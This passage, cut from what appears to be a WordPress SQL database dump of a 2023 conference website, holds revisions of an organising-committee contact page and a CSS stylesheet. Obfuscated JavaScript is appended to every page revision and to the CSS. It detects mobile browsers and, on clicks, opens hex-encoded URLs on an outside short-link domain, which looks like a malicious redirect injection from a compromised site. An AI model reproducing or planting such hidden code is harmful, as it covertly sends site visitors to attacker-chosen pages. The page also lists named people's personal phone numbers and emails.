_0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Executive Local Committee','','inherit','closed','closed','','4849-revision-v1','','','2023-06-28 09:35:00','2023-06-28 09:35:00','',4849,'https://gsw2023.com/?p=4950',0,'revision','',0),
(4951,4,'2023-06-28 09:36:16','2023-06-28 09:36:16','<p>[vc_row css=\".vc_custom_1687871707649{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1687871751542{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687871759816{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Chairman</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_single_image image=\"4614\" img_size=\"\" alignment=\"center\" style=\"vc_box_rounded\" image_hovers=\"false\" el_class=\"img_card_2\"][/vc_column][vc_column width=\"3/4\"][vc_column_text el_class=\"zero-pad\"]<span style=\"font-size: 12pt; color: #000000;\"><em><strong>Prof. Dr. Alaa Abdelwahed Abdelbary</strong></em></span><br />\nVice President for Post Graduate and Scientific Research<br />\nArab Academy for Science, Technology and Maritime Transport<br />\nP.O.Box 1029, Alexandria, Egypt</p>\n<table style=\"margin: 0px; padding: 0px;\">\n<tbody>\n<tr>\n<td style=\"width: 20%;\"><strong>E-mail:</strong></td>\n<td style=\"width: 26%;\">aaelbary@aast.edu</td>\n<td style=\"width: 26%;\">aaelbary@gsw2023.com</td>\n<td style=\"width: 26%;\">gsw2023@aast.edu</td>\n</tr>\n<tr>\n<td style=\"width: 20%;\"><strong>Contacts:</strong></td>\n<td style=\"width: 26%;\">Office: +203 5497598</td>\n<td style=\"width: 26%;\">Fax: +203 5497598</td>\n<td style=\"width: 26%;\">Mobile: +20 100 7382 198</td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text css=\".vc_custom_1687858969667{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Scientific Affairs</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687871606693{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1687943626436{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687944968556{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\" el_class=\"gsw_card\"]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/dr-nashwa-1.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Nashwa El-Bendary</strong></em></span><br />\n<span style=\"font-size: 9pt;\"><a href=\"mailto:nashwa.elbendary@aast.edu\"> nashwa.elbendary@aast.edu </a></span><br />\n<span style=\"font-size: 12pt;\">+201227217550</span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860537997{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text el_class=\"gsw_card\"]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Yahya_Photo_Enhanced3.png\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Yahya Z. Mohasseb </strong></em></span><br />\n<span style=\"font-size: 12pt;\">ymohasseb@aast.edu</span><br />\n<span style=\"font-size: 12pt;\">+201227217550</span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860547068{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text el_class=\"gsw_card\"]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/amira_ibrahim_zaki.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Amira Zaki</strong></em></span><br />\n<span style=\"font-size: 12pt;\">amzak10@aast.edu</span><br />\n<span style=\"font-size: 12pt;\">+201006619608</span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860553730{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text el_class=\"gsw_card\"]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/radwa_ahmed_osman.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Dr. Radwa Osman </strong></em></span><br />\n<span style=\"font-size: 12pt;\">radwa.ahmed@aast.edu</span><br />\n<span style=\"font-size: 12pt;\">+201001552854</span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column css=\".vc_custom_1687871596223{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687871574136{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>IT Support</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687871361897{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687871425647{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687944895884{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\" el_class=\"gsw_card\"]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/avatar.jpeg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Eng. Ayman Elzagh</strong></em></span><br />\n<span style=\"font-size: 12pt;\">Local Web director<br />\nGSW2023, Egypt<br />\n<span style=\"font-size: 11pt;\">ay.zagh@gmail.com</span><br />\n<span style=\"font-size: 12pt;\">+201210007979</span></span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/3\" css=\".vc_custom_1687871435951{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;padding-left: 5px !important;}\"][vc_column_text css=\".vc_custom_1687944881119{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\" el_class=\"gsw_card\"]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/avatar.jpeg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Eng. Ahmed ElGamal </strong></em></span><br />\n<span style=\"font-size: 12pt;\">gamal97@gmail.com </span><br />\n<span style=\"font-size: 12pt;\">+201001610401</span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/3\" css=\".vc_custom_1687871462058{margin-bottom: 0px !important;border-top-width: 0px !important;border-right-width: 0px !important;border-bottom-width: 0px !important;border-left-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;padding-left: 5px !important;border-left-color: rgba(0,0,0,0.01) !important;border-right-color: rgba(0,0,0,0.01) !important;border-top-color: rgba(0,0,0,0.01) !important;border-bottom-color: rgba(0,0,0,0.01) !important;}\" el_class=\"gsw-no-border\"][vc_column_text css=\".vc_custom_1687871454148{margin-top: 0px !important;margin-right: 0px !important;margin-bottom: 0px !important;margin-left: 0px !important;border-top-width: 0px !important;border-right-width: 0px !important;border-bottom-width: 0px !important;border-left-width: 0px !important;padding-top: 0px !important;padding-right: 0px !important;padding-bottom: 0px !important;padding-left: 0px !important;border-left-color: rgba(255,255,255,0.01) !important;border-right-color: rgba(255,255,255,0.01) !important;border-top-color: rgba(255,255,255,0.01) !important;border-bottom-color: rgba(255,255,255,0.01) !important;}\" el_class=\"gsw-no-border\"]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/nagy.jpeg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Eng. Nagy K. Aly</strong></em></span><br />\n<span style=\"font-size: 12pt;\">nagy@aast.edu</span><br />\n<span style=\"font-size: 12pt;\">+201141606029</span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687871347747{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_column css=\".vc_custom_1687861905334{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_column_text css=\".vc_custom_1687861705937{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 12pt;\">Arab Academy for Science &amp; Technology &amp; Maritime Transport</span></strong><br />\n<strong><span style=\"font-size: 12pt;\">P.O.Box: 1029 Alexandria Egypt</span></strong>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687872978322{margin-bottom: 10px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column][vc_column_text css=\".vc_custom_1687872285543{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Hotels Reservation and Public Relations</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_single_image image=\"4936\" img_size=\"\" alignment=\"center\" style=\"vc_box_rounded\" image_hovers=\"false\" el_class=\"img_card_2\"][/vc_column][vc_column width=\"3/4\"][vc_column_text el_class=\"zero-pad\"]<span style=\"font-size: 12pt; color: #000000;\"><em><strong>Mr. Yasser Elrashidi</strong></em></span><br />\nDirector of Events and conferences Department<br />\nArab Academy for Science, Technology and Maritime Transport<br />\nP.O.Box 1029, Alexandria, Egypt</p>\n<table>\n<tr>\n<td>Email:</td>\n<td>yasserelrashidi@aast.edu</td>\n</tr>\n<tr>\n<td>Mobile:</td>\n<td>+201270059999</td>\n</tr>\n</table>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687873543921{margin-bottom: 10px !important;}\"][vc_column][vc_column_text css=\".vc_custom_1687873078553{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Financial Affairs</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_single_image image=\"4939\" img_size=\"\" alignment=\"center\" style=\"vc_box_rounded\" image_hovers=\"false\" el_class=\"img_card_2\"][/vc_column][vc_column width=\"3/4\"][vc_column_text el_class=\"zero-pad\"]<span style=\"font-size: 12pt; color: #000000;\"><em><strong>Mr. Mohamed Abdallah Mahmoud </strong></em></span><br />\nLocal financial Director, GSW2023, Egypt<br />\nArab Academy for Science, Technology and Maritime Transport<br />\nP.O.Box 1029, Alexandria, Egypt</p>\n<table>\n<tbody>\n<tr>\n<td>Email:</td>\n<td>mohamed_abdallah20102002@yahoo.com</td>\n</tr>\n<tr>\n<td>Mobile:</td>\n<td>+201141401861</td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Executive Local Committee','','inherit','closed','closed','','4849-revision-v1','','','2023-06-28 09:36:16','2023-06-28 09:36:16','',4849,'https://gsw2023.com/?p=4951',0,'revision','',0),
(4953,4,'2023-06-28 09:37:04','2023-06-28 09:37:04','.menu-text:hover{\n	cursor: pointer !important;\n}\n.zero-pad{\n	padding: 0 !important;\n}\n.zero-pad-deep, .zero-pad-deep *{\n	padding: 0 !important;\n}\n\n.zero-mar{\n	margin: 0 !important;\n}\n.zero-mar-deep, .zero-mar-deep *{\n	margin: 0 !important;\n}\n.full-width{\n	width:100% !important;\n}\n.center{\n	text-align: center !important;\n}\n.img_card_1{\n	width: 110px;\n	height: 150px;\n	object-fit: cover;\n	border-radius: 10px;\n}\n.img_card_2 img{\n	width: 150px;\n	height: 200px;\n	object-fit: cover;\n	border-radius: 10px;\n}\n\n\n.gsw_card, .gsw_card *{\n	margin: 0 !important;\n}\n.gsw_card a{\n	color: #4169e1 !important;\n	text-decoration: none !important;\n}\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const 